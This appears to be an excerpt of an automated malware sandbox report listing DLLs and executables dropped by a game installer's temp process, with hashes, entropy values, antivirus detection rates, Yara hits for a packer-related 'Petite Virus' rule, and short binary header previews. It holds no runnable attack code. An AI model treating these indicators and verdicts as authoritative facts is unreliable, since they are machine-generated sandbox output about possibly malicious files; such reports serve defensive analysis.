                                                                                  SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                  SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11532
                                                                                  Entropy (8bit):7.219753259626605
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                                  MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                                  SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                                  SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                                  SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):19008
                                                                                  Entropy (8bit):7.672481244971812
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                  MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                  SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                  SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                  SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):258560
                                                                                  Entropy (8bit):6.491223412910377
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                  MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                  SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                  SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                  SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):867854
                                                                                  Entropy (8bit):4.9264497464202694
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                  MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                  SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                  SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                  SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):294926
                                                                                  Entropy (8bit):6.191604766067493
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                  MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                  SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                  SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                  SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):35588
                                                                                  Entropy (8bit):7.817557274117395
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                  MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                  SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                  SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                  SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):26126
                                                                                  Entropy (8bit):6.048294343792499
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                  MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                  SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                  SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                  SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):266254
                                                                                  Entropy (8bit):6.343813822604148
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                                  MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                                  SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                                  SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                                  SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):845312
                                                                                  Entropy (8bit):6.581151900686739
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                  MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                  SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                  SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                  SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):16910
                                                                                  Entropy (8bit):5.289608933932413
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                  MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                  SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                  SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                  SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):5960
                                                                                  Entropy (8bit):5.956401374574174
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                  MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                  SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                  SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                  SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22542
                                                                                  Entropy (8bit):5.5875455203930615
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                  MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                  SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                  SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                  SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):18966
                                                                                  Entropy (8bit):7.620111275837424
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                  MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                  SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                  SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                  SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp, Author: Joe Security
                                                                                  Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):512014
                                                                                  Entropy (8bit):6.566561154468342
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                  MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                  SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                  SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                  SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.423554884287906
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                  MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                  SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                  SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                  SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):13838
                                                                                  Entropy (8bit):5.173769974589746
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                  MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                  SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                  SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                  SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):39304
                                                                                  Entropy (8bit):7.819409739152795
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                                  MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                                  SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                                  SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                                  SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36752
                                                                                  Entropy (8bit):7.780431937344781
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                  MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                  SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                  SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                  SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                  Malicious:false
